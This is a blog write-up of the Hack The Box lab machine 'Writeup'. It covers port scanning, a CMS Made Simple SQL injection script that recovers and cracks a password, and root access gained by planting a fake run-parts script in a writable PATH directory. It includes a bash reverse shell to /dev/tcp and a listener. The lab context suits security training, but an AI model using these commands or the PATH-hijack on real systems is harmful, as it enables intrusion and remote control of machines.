Hackthebox – Write-up

As with any box, this box also started with the default sequence of Full Port scans on TCP (all ports), UDP (top-20) and a TCP -A scan.

root@kalivm:~/WriteUp# nmap -A -oN fullscan-A 10.10.10.138 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-02 18:41 CEST
Nmap scan report for 10.10.10.138
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.03 ms 10.10.12.1
2   16.06 ms 10.10.10.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 12:53:01 2019 -- 1 IP address (1 host up) scanned in 26.72 seconds

Nothing particularly interesting, so I started browsing the web server and found a robots.txt file containing a reference to a /writeup directory, refering to a blog.

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Analysis of the blog shows that the blogging software CMS Made Simple is used.
Source of Writeup mainpage showing CMS Made Simple
Research shows several vulnerabilities including a SQL Injection vulnerability with a ready-made exploitation script. When running the script, it shows a hollywood-like password cracking attempt with both the username and the password as a result

root@kalivm:~/WriteUp# ./cmsms.py -u http://writeup.htb/writeup -w /usr/share/wordlists/rockyou.txt -c

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

root@kalivm:~/WriteUp# ssh jkr@writeup.htb
jkr@writeup.htb's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  2 12:56:35 2019 from 10.10.15.39
jkr@writeup:~$ cat user.txt
d4e493fd4<noflag>b1aa6a55319f978

Privilege escalation

After some initial enumeration, There was writable directory that I thought was remarkable but did not have any good use for yet.

jkr@writeup:~$ find / -writable -type d 2>/dev/null
---snip---
/var/local
/var/lib/php/sessions
/var/tmp
/usr/local
/usr/local/bin
/usr/local/sbin
---snip---
/home/jkr
/home/jkr/.nano

Other than that, no specific items stood out and it became time to start analyzing running processes. Since ps aux only shows currently running processes, using pspy would be very useful to watch spawned processes in real-time. This resulted within a short time in something that really stood out.

jkr@writeup:/tmp/sed$ wget http://10.10.15.83:8000/enum/pspy64
--2019-08-02 13:10:12--  http://10.10.15.83:8000/enum/pspy64
Connecting to 10.10.15.83:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4468984 (4.3M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64               100%[===============================>]   4.26M  5.66MB/s    in 0.8s

2019-08-02 13:10:12 (5.66 MB/s) - ‘pspy64’ saved [4468984/4468984]

jkr@writeup:/tmp/sed$ chmod +x pspy64 
jkr@writeup:/tmp/sed$ ./pspy64 
---snip---
2019/08/02 13:11:29 CMD: UID=0    PID=6594   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
---snip---

Now this is where things get interesting. The path is being set to first include /usr/local/sbin (which I found out earlier, is writable), and the run-parts binary is not sufficiently secured by a full-path entry. This allowed me to create a short script that copy/pastes the root.txt to /tmp and change permissions so I can read it.

jkr@writeup:/tmp$ mkdir sed
jkr@writeup:/tmp$ cd sed
jkr@writeup:/tmp/sed$ nano rp
#!/usr/bin/env bash
cp /root/root.txt /tmp/sed/sed.txt
chmod 777 /tmp/sed/sed.txt
jkr@writeup:/tmp/sed$ chmod +x rp

Copy the created script to the /usr/local/sbin called run-parts and have and then wait until someone logs in again, triggering the script.

jkr@writeup:/tmp/sed$ mv rp /usr/local/sbin/run-parts
jkr@writeup:/tmp/sed$ ls
sed.txt
jkr@writeup:/tmp/sed$ cat sed.txt 
eeba47f60b4<noflag>4f9b6198d7226

Alternative Privilege Escalation

As an alternative, I could also have added a reverse shell to my own machine

jkr@writeup:/tmp/sed$ nano rp
#!/bin/bash
bash -i >& /dev/tcp/10.10.13.125/9996 0>&1
jkr@writeup:/tmp/sed$ chmod +x rp
jkr@writeup:/tmp/sed$ cp rp /usr/local/sbin/run-parts

Copy the script and wait until someone logs in while having a listener on my own system

root@kalivm:~/WriteUp# nc -nlvp 9996
Listening on [0.0.0.0] (family 2, port 9996)
Connection from 10.10.10.138 54582 received!
bash: cannot set terminal process group (2099): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# cat /root/root.txt
eeba47f60b4<noflag>4f9b6198d7226

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.